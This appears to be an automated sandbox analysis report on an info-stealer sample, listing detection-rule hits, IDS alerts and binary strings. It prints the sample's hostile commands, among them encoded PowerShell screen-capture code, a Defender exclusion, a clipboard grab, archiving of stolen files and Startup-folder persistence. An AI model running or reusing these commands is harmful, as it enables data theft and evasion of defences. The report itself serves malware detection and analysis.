AHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAA
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Resource.exe", ParentImage: C:\Users\user\Desktop\Resource.exe, ParentProcessId: 6048, ParentProcessName: Resource.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 5772, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Resource.exe", ParentImage: C:\Users\user\Desktop\Resource.exe, ParentProcessId: 6048, ParentProcessName: Resource.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe'", ProcessId: 2360, ProcessName: cmd.exe
              Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\Resource.exe, ProcessId: 6048, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ? .scr
              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\Resource.exe, ProcessId: 6048, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\Resource.exe, ProcessId: 6048, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ? .scr
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7452, TargetFilename: C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.cmdline
              Source: Process startedAuthor: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe a -r -hp"mined" "C:\Users\user\AppData\Local\Temp\rEC04.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe a -r -hp"mined" "C:\Users\user\AppData\Local\Temp\rEC04.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe a -r -hp"mined" "C:\Users\user\AppData\Local\Temp\rEC04.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7112, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe a -r -hp"mined" "C:\Users\user\AppData\Local\Temp\rEC04.zip" *, ProcessId: 8048, ProcessName: rar.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2360, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe', ProcessId: 7232, ProcessName: powershell.exe

              Data Obfuscation

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAA
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-06T16:18:40.033280+010028577521A Network Trojan was detected149.154.167.220443192.168.2.549853TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-06T16:18:39.056871+010028577511A Network Trojan was detected192.168.2.549853149.154.167.220443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-06T16:18:39.056741+010018100081Potentially Bad Traffic192.168.2.549853149.154.167.220443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: Resource.exeVirustotal: Detection: 71%Perma Link
              Source: Resource.exeReversingLabs: Detection: 65%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
              Source: Resource.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185D901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,103_2_00007FF6185D901C
              Source: Resource.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.pdbhP source: powershell.exe, 00000044.00000002.2259141089.000001B7D5905000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: Resource.exe, 00000001.00000002.2487117258.00007FF8B9F61000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: Resource.exe, 00000001.00000002.2480153841.00007FF8A8290000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: Resource.exe, 00000001.00000002.2486477048.00007FF8B8F71000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: Resource.exe, Resource.exe, 00000001.00000002.2485119166.00007FF8B7DF1000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbEE source: Resource.exe, 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 3.0.11 19 Sep 20233.0.11built on: Wed Sep 27 22:33:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_push_octet_ptrOSSL_PARAM_BLD_to_param..\s\crypto\params.c source: Resource.exe, 00000001.00000002.2481190225.00007FF8A8642000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: Resource.exe, 00000001.00000002.2486194119.00007FF8B8B3C000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: Resource.exe, Resource.exe, 00000001.00000002.2481190225.00007FF8A8642000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: Resource.exe, 00000001.00000002.2486921146.00007FF8B9841000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: Resource.exe, 00000001.00000002.2486194119.00007FF8B8B3C000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: Resource.exe, 00000001.00000002.2486713110.00007FF8B93C1000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: Resource.exe, 00000000.00000003.2015760387.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2487613545.00007FF8BFAC1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: Resource.exe, 00000000.00000003.2015760387.00000203A2F43000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2487613545.00007FF8BFAC1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: Resource.exe, Resource.exe, 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp
